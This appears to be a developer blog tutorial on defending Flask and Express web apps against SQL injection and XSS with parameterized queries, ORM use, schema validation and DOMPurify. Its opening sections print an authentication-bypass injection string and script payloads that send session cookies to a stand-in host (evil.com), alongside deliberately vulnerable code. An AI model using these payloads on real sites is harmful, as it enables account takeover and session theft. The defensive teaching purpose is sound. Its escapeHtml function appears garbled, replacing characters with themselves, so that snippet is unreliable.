How to Sanitize User Inputs to Prevent SQL Injection and XSS Attacks
Problem
When I deployed my first web application, I got this shocking result:
SECURITY ALERT: Your database has been compromised
Attacker input: ' OR '1'='1' --Result: All user records exposed
Query executed: SELECT * FROM users WHERE username = '' OR '1'='1' --' AND password = '...'The attacker bypassed authentication with a simple SQL injection string. My login form had zero input sanitization.
Even worse, when I checked my comment section, I found this:
<script> document.location = 'https://evil.com/steal?cookie=' + document.cookie</script>Every visitor’s session cookie was being sent to an attacker’s server. This is XSS (Cross-Site Scripting), and it happened because I trusted user input.
Environment
- Python 3.10 / Node.js 18
- SQLAlchemy 2.0 (Python ORM)
- Express.js 4.x (Node.js framework)
- Zod 3.x (TypeScript validation)
- DOMPurify 3.x (HTML sanitization)
What happened?
I built a simple user registration form without any input validation:
from flask import Flask, requestimport sqlite3
app = Flask(__name__)
@app.route('/login', methods=['POST'])def login(): username = request.form['username'] password = request.form['password']
# VULNERABLE: Direct string concatenation conn = sqlite3.connect('users.db') cursor = conn.cursor() query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'" cursor.execute(query) # NEVER do this!
user = cursor.fetchone() if user: return "Login successful" return "Login failed"When I tested with normal input, it worked fine:
curl -X POST http://localhost:5000/login -d "username=john&password=secret"# Result: Login failed (user doesn't exist)But an attacker sent this:
curl -X POST http://localhost:5000/login -d "username=admin' OR '1'='1' --&password=anything"# Result: Login successful (bypassed authentication!)The injected SQL became:
SELECT * FROM users WHERE username = 'admin' OR '1'='1' --' AND password = 'anything'The -- comment ignores the password check, and '1'='1' is always true. The attacker logged in as admin without knowing the password.
For XSS, my comment display was equally vulnerable:
// VULNERABLE: Direct innerHTML assignmentfunction displayComment(comment) { document.getElementById('comments').innerHTML = comment.content}An attacker submitted:
comment.content = '<script>fetch("https://evil.com/steal?c=" + document.cookie)</script>'Every visitor’s browser executed the malicious script.
How to solve it?
I need to implement proper input handling. Let me fix both vulnerabilities.
Step 1: Use Parameterized Queries (SQL Injection Prevention)
First, I fixed the SQL injection by using parameterized queries:
from flask import Flask, requestimport sqlite3
app = Flask(__name__)
@app.route('/login', methods=['POST'])def login(): username = request.form['username'] password = request.form['password']
conn = sqlite3.connect('users.db') cursor = conn.cursor()
# SAFE: Parameterized query query = "SELECT * FROM users WHERE username = ? AND password = ?" cursor.execute(query, (username, password)) # Parameters are escaped automatically
user = cursor.fetchone() if user: return "Login successful" return "Login failed"When I tested the same attack:
curl -X POST http://localhost:5000/login -d "username=admin' OR '1'='1' --&password=anything"# Result: Login failed (attack blocked!)The parameterized query treats the entire input as a string literal, not SQL code.
Step 2: Use ORM for Safer Database Operations
I switched to SQLAlchemy for even better protection:
from flask import Flask, requestfrom sqlalchemy import create_engine, textfrom sqlalchemy.orm import sessionmaker
app = Flask(__name__)engine = create_engine('sqlite:///users.db')Session = sessionmaker(bind=engine)
@app.route('/login', methods=['POST'])def login(): username = request.form['username'] password = request.form['password']
session = Session()
# SAFE: SQLAlchemy with named parameters query = text("SELECT * FROM users WHERE username = :username AND password = :password") result = session.execute(query, {"username": username, "password": password}) user = result.fetchone()
session.close()
if user: return "Login successful" return "Login failed"I can also use the ORM model approach:
from sqlalchemy import Column, Integer, Stringfrom sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class User(Base): __tablename__ = 'users'
id = Column(Integer, primary_key=True) username = Column(String) password = Column(String) # Should be hashed in production!
# Query with ORM (automatically parameterized)user = session.query(User).filter_by(username=username).first()Step 3: Implement Input Validation
I added validation to reject invalid inputs before they reach the database:
import { z } from 'zod'
// Define schema for user inputconst userSchema = z.object({ email: z.string().email('Invalid email format'), age: z.number().int().min(0).max(150, 'Age must be between 0 and 150'), username: z.string() .min(3, 'Username must be at least 3 characters') .max(20, 'Username must be at most 20 characters') .regex(/^[a-zA-Z0-9_]+$/, 'Username can only contain letters, numbers, and underscores'), password: z.string() .min(8, 'Password must be at least 8 characters') .regex(/[A-Z]/, 'Password must contain at least one uppercase letter') .regex(/[a-z]/, 'Password must contain at least one lowercase letter') .regex(/[0-9]/, 'Password must contain at least one number')})
function validateUserInput(input: unknown) { try { const validated = userSchema.parse(input) return { success: true, data: validated } } catch (error) { if (error instanceof z.ZodError) { return { success: false, errors: error.errors.map(e => ({ field: e.path.join('.'), message: e.message })) } } throw error }}
// Usageconst result = validateUserInput({ age: 25, username: 'john_doe', password: 'SecurePass123'})
if (!result.success) { console.log('Validation errors:', result.errors)}Step 4: Sanitize HTML Output (XSS Prevention)
For XSS, I needed to sanitize output before rendering:
import DOMPurify from 'dompurify'
// SAFE: Sanitize before renderingfunction displayComment(comment) { const clean = DOMPurify.sanitize(comment.content) document.getElementById('comments').innerHTML = clean}
// Test with malicious inputconst maliciousComment = { content: '<script>alert("XSS")</script><p>Safe content</p>'}
displayComment(maliciousComment)// Result: <p>Safe content</p> (script tag removed)I can also configure DOMPurify for stricter rules:
import DOMPurify from 'dompurify'
// Configure allowed tags and attributesconst clean = DOMPurify.sanitize(userInput, { ALLOWED_TAGS: ['p', 'b', 'i', 'em', 'strong', 'a'], ALLOWED_ATTR: ['href'], ALLOW_DATA_ATTR: false})
// For even stricter output encodingfunction escapeHtml(unsafe) { return unsafe .replace(/&/g, "&") .replace(/</g, "<") .replace(/>/g, ">") .replace(/"/g, """) .replace(/'/g, "'")}
// Use different encoding for different contextsconst encodedForHTML = escapeHtml(userInput)const encodedForJS = JSON.stringify(userInput)const encodedForURL = encodeURIComponent(userInput)Step 5: Express.js Middleware Pattern
I created reusable middleware for validation:
const { body, validationResult } = require('express-validator')
// Validation middleware chainconst validateRegistration = [ body('email') .isEmail() .normalizeEmail() .withMessage('Must be a valid email'),
body('username') .trim() .escape() // Escape HTML entities .isLength({ min: 3, max: 20 }) .withMessage('Username must be 3-20 characters'),
body('password') .isLength({ min: 8 }) .withMessage('Password must be at least 8 characters'),
// Handle validation result (req, res, next) => { const errors = validationResult(req) if (!errors.isEmpty()) { return res.status(400).json({ success: false, errors: errors.array() }) }
// Input is validated and sanitized // Safe to use req.body values next() }]
// Usage in routeapp.post('/register', validateRegistration, async (req, res) => { const { email, username, password } = req.body
// Values are now validated and sanitized await createUser(email, username, password) res.json({ success: true })})Step 6: Defense in Depth
I combined all techniques for maximum protection:
from flask import Flask, request, jsonifyfrom sqlalchemy import create_engine, textfrom sqlalchemy.orm import sessionmakerimport htmlimport re
app = Flask(__name__)
# Input validation patternsEMAIL_PATTERN = re.compile(r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$')USERNAME_PATTERN = re.compile(r'^[a-zA-Z0-9_]{3,20}$')
def validate_input(username: str, email: str) -> tuple[bool, str]: """Validate input format before processing""" if not username or not email: return False, "Username and email are required"
if not USERNAME_PATTERN.match(username): return False, "Username must be 3-20 characters (letters, numbers, underscore only)"
if not EMAIL_PATTERN.match(email): return False, "Invalid email format"
return True, ""
@app.route('/register', methods=['POST'])def register(): username = request.form.get('username', '').strip() email = request.form.get('email', '').strip()
# Layer 1: Input validation is_valid, error_msg = validate_input(username, email) if not is_valid: return jsonify({"success": False, "error": error_msg}), 400
# Layer 2: Sanitize for display (in case we need to show errors) safe_username = html.escape(username) safe_email = html.escape(email)
# Layer 3: Parameterized query (SQL injection prevention) session = Session() try: query = text(""" INSERT INTO users (username, email, created_at) VALUES (:username, :email, NOW()) """) session.execute(query, {"username": username, "email": email}) session.commit()
return jsonify({ "success": True, "message": f"User {safe_username} registered" }) except Exception as e: session.rollback() # Layer 4: Don't leak database errors return jsonify({ "success": False, "error": "Registration failed. Please try again." }), 500 finally: session.close()The reason
I think the key reasons for these vulnerabilities are:
1. Trusting user input blindly
- Any data from forms, URLs, cookies, or APIs is untrusted
- Attackers can manipulate every piece of input
- Frontend validation is for UX, not security
2. String concatenation in SQL
f"SELECT * FROM users WHERE id = {user_input}"is dangerous- The database interprets user input as SQL code
- Parameterized queries separate code from data
3. Rendering raw HTML
innerHTML = userInputexecutes any embedded scripts- Browser trusts whatever you put in the DOM
- Sanitization removes dangerous elements before rendering
4. Only frontend validation
- JavaScript can be disabled or bypassed
- Backend must validate independently
- Defense in depth means multiple layers
Summary
In this post, I showed how to sanitize user inputs to prevent SQL injection and XSS attacks. The key points are:
- Never concatenate user input into SQL strings - Use parameterized queries or ORM
- Validate input format - Use schema validation with Zod or similar libraries
- Sanitize output - Use DOMPurify for HTML, escape for other contexts
- Backend validation is mandatory - Frontend is for UX only
- Defense in depth - Multiple security layers protect against single failures
A single unsecured input field can compromise your entire database. The cost of implementing proper sanitization is minimal compared to the cost of a security breach.
Final Words + More Resources
My intention with this article was to help others share my knowledge and experience. If you want to contact me, you can contact by email: Email me
Here are also the most important links from this article along with some further resources that will help you in this scope:
- 👨💻 OWASP Input Validation Cheat Sheet
- 👨💻 OWASP SQL Injection Prevention
- 👨💻 OWASP XSS Prevention Cheat Sheet
- 👨💻 DOMPurify Documentation
Oh, and if you found these resources useful, don’t forget to support me by starring the repo on GitHub!
Comments